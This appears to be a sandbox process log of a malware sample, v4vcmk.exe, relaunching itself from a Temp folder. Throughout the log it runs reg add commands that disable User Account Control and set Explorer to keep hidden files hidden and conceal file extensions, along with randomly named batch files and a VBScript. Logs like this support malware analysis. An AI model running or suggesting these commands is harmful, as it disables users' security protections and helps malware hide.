reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CMcQMAQg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UgAowsAQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ggoEEEkY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hicUQwEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\syccQMwc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mIAIQQwQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jMAswIoA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vkIAwoAs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUEIAYEU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LcokMggM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEcEgMYY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iuckgEQs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmQgwEUM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iEMYUIcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GyAcMEEs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bAIkQcsw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCgUIgMc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mockcUgE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EkEYoEYI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SkAYYQIw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YSUQsYIs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ECAUgUcA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugcockcY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JAAogoMs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bqUoEEAs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JqAsYEMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FkEQsoEM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lOwEooUs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

